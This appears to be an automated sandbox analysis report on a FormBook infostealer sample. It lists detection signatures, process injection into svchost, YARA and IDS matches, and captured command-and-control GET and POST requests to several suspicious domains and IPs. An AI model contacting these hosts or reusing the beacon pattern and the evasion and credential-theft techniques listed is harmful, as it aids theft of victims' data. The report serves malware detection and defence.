
Windows Analysis Report
VSP469620.exe

Overview

General Information

Sample name: VSP469620.exe
Analysis ID: 1561727
MD5: e4cb2ac542d27b0c73c5a290bf5ffe77
SHA1: 0340de260b7364564c4c3480b0489d4edf431a3e
SHA256: 9060815773bcc67db557cd691aeb3c74d471008e7c9388d13c7b03468b11dcfe
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • VSP469620.exe (PID: 7980 cmdline: "C:\Users\user\Desktop\VSP469620.exe" MD5: E4CB2AC542D27B0C73C5A290BF5FFE77)
    • svchost.exe (PID: 8060 cmdline: "C:\Users\user\Desktop\VSP469620.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • VgGNmkZfWSSE.exe (PID: 3300 cmdline: "C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • icsunattend.exe (PID: 744 cmdline: "C:\Windows\SysWOW64\icsunattend.exe" MD5: 6D01FCE30EF8A2CA0D385593E90879E5)
          • VgGNmkZfWSSE.exe (PID: 6048 cmdline: "C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1516 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
4.2.svchost.exe.6d0000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.svchost.exe.6d0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\VSP469620.exe", CommandLine: "C:\Users\user\Desktop\VSP469620.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\VSP469620.exe", ParentImage: C:\Users\user\Desktop\VSP469620.exe, ParentProcessId: 7980, ParentProcessName: VSP469620.exe, ProcessCommandLine: "C:\Users\user\Desktop\VSP469620.exe", ProcessId: 8060, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\VSP469620.exe", CommandLine: "C:\Users\user\Desktop\VSP469620.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\VSP469620.exe", ParentImage: C:\Users\user\Desktop\VSP469620.exe, ParentProcessId: 7980, ParentProcessName: VSP469620.exe, ProcessCommandLine: "C:\Users\user\Desktop\VSP469620.exe", ProcessId: 8060, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T08:13:48.549892+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49853 | 172.104.82.74 | 80 | TCP
2024-11-24T08:14:09.110171+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49904 | 31.31.196.177 | 80 | TCP
2024-11-24T08:14:24.686321+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49943 | 13.248.169.48 | 80 | TCP
2024-11-24T08:14:39.454457+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49980 | 13.248.169.48 | 80 | TCP
2024-11-24T08:14:55.212395+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49990 | 107.167.84.42 | 80 | TCP
2024-11-24T08:15:10.273169+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49994 | 209.74.77.108 | 80 | TCP
2024-11-24T08:15:24.991140+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49998 | 104.21.44.16 | 80 | TCP
2024-11-24T08:15:39.670779+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 50002 | 13.248.169.48 | 80 | TCP


AV Detection

Source: VSP469620.exe | ReversingLabs: Detection: 63%
Source: VSP469620.exe | Virustotal: Detection: 64%
Source: Yara match | File source: 4.2.svchost.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: VSP469620.exe | Joe Sandbox ML: detected
Source: VSP469620.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VgGNmkZfWSSE.exe, 00000006.00000000.1738250337.000000000074E000.00000002.00000001.01000000.00000005.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3141773631.000000000074E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: VSP469620.exe, 00000002.00000003.1302642095.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, VSP469620.exe, 00000002.00000003.1300070020.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1717413410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1715037623.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.000000000339E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1818867931.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1821159790.0000000004369000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.0000000004510000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: VSP469620.exe, 00000002.00000003.1302642095.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, VSP469620.exe, 00000002.00000003.1300070020.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1717413410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1715037623.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.000000000339E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, icsunattend.exe, 00000007.00000003.1818867931.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1821159790.0000000004369000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.0000000004510000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdbGCTL source: svchost.exe, 00000004.00000002.1818680712.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818663703.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000002.3143693434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdb source: svchost.exe, 00000004.00000002.1818680712.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818663703.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000002.3143693434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3145271641.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000000.1887577336.0000000002CDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000026E9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3145271641.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000000.1887577336.0000000002CDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000026E9C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AF6CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00AF6CA9
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00AF60DD
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00AF63F9
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00AFEB60
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00AFF5FA
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00AFF56F FindFirstFileW,FindClose,2_2_00AFF56F
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00B01B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B01B2F
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00B01C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B01C8A
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00B01F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B01F94
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 7_2_0036C730 FindFirstFileW,FindNextFileW,FindClose,7_2_0036C730
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 4x nop then xor eax, eax 7_2_00359F20
Source: C:\Windows\SysWOW64\icsunattend.exe | Code function: 4x nop then mov ebx, 00000004h 7_2_043604D8

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49853 -> 172.104.82.74:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49904 -> 31.31.196.177:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49943 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49980 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49994 -> 209.74.77.108:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49998 -> 104.21.44.16:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49990 -> 107.167.84.42:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50002 -> 13.248.169.48:80
Source: DNS query: www.aktmarket.xyz
Source: DNS query: www.heliopsis.xyz
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: AS-REGRU
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\VSP469620.exe | Code function: 2_2_00B04EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_00B04EB5
Source: global traffic | HTTP traffic detected:
  GET /2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.funnystory.online
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
Source: global traffic | HTTP traffic detected:
  GET /9ul0/?9HaD=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeT5OVDDglLmzebYBZGko1gl0UlPxFA==&wdv4=1RD4 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.nartex-uf.online
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
Source: global traffic | HTTP traffic detected:
  GET /4mbo/?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD4 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.aktmarket.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
Source: global traffic | HTTP traffic detected:
  GET /5cnx/?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD4 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.a1shop.shop
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
Source: global traffic | HTTP traffic detected:
  GET /bw18/?9HaD=shKGC8bK6vrLacDTgBZk6Rr0hJ1HgilraKgFYlsRqeuAlXFl2di5oGGCrfCVn8Xiw6EWTnMqBe6emh6gDO/8taYQfWAt8ESD/mKf9DNdyFPR+ujYTQ==&wdv4=1RD4 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.cssa.auction
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
Source: global traffic | HTTP traffic detected:
  GET /chlo/?9HaD=WJ8Pjkl58Iqvi8v+346A7W2JCurCP35uavULUkOWxAdWurHwpVHOzp+Wq3EHGCpSI2RFmnu5nAtTba/o9p0CIyXXw9XhC0V5AfBtSRheiGahxikEfA==&wdv4=1RD4 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.urbanxplore.info
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
Source: global traffic | HTTP traffic detected:
  GET /stfe/?wdv4=1RD4&9HaD=ORqY22CcDufF1m336sq5Rb7ktLrp91WB7UJGYn2fYGIkb40HC4QAI0Uo1DAA/E2P6coBVsarHDRzXgtbaXIBPtY5QkEUWLhgXwOO0YSIlO9ptKaJ+w== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.3kw40881107247y.click
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
Source: global traffic | HTTP traffic detected:
  GET /cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Host: www.heliopsis.xyz
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
Source: global traffic | DNS traffic detected: DNS query: www.funnystory.online
Source: global traffic | DNS traffic detected: DNS query: www.nartex-uf.online
Source: global traffic | DNS traffic detected: DNS query: www.aktmarket.xyz
Source: global traffic | DNS traffic detected: DNS query: www.a1shop.shop
Source: global traffic | DNS traffic detected: DNS query: www.cssa.auction
Source: global traffic | DNS traffic detected: DNS query: www.urbanxplore.info
Source: global traffic | DNS traffic detected: DNS query: www.3kw40881107247y.click
Source: global traffic | DNS traffic detected: DNS query: www.heliopsis.xyz
Source: global traffic | DNS traffic detected: DNS query: www.mdpc7.top
Source: unknown | HTTP traffic detected:
  POST /9ul0/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.5
  Host: www.nartex-uf.online
  Origin: http://www.nartex-uf.online
  Referer: http://www.nartex-uf.online/9ul0/
  Cache-Control: max-age=0
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 193
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
  Data Raw: 39 48 61 44 3d 79 2b 4d 38 68 6c 52 67 59 6e 6c 63 79 36 4f 63 6a 6a 54 68 4e 46 66 53 4c 6a 2f 79 70 51 33 33 52 7a 68 65 4f 42 45 65 77 61 72 61 41 43 64 41 55 31 52 42 65 56 49 6b 56 5a 6a 65 73 4f 35 32 37 68 6b 4e 72 77 6a 7a 65 6c 68 72 6e 75 30 38 67 43 6b 4e 63 79 63 45 4b 53 47 66 31 4c 44 2f 41 35 55 43 5a 58 6b 47 31 53 6f 4a 4d 53 33 61 57 45 4f 47 73 6b 78 6f 76 61 56 71 59 44 74 33 57 42 44 77 6b 65 4c 48 35 6c 43 30 43 31 6b 66 67 41 33 43 77 2b 4f 50 72 47 47 45 70 54 4f 74 75 4c 6f 53 6d 70 68 71 52 30 4a 64 6b 32 6e 70 6f 71 58 59 39 52 64 6c 61 4c 31 69
  Data Ascii: 9HaD=y+M8hlRgYnlcy6OcjjThNFfSLj/ypQ33RzheOBEewaraACdAU1RBeVIkVZjesO527hkNrwjzelhrnu08gCkNcycEKSGf1LD/A5UCZXkG1SoJMS3aWEOGskxovaVqYDt3WBDwkeLH5lC0C1kfgA3Cw+OPrGGEpTOtuLoSmphqR0Jdk2npoqXY9RdlaL1i
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:14:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 
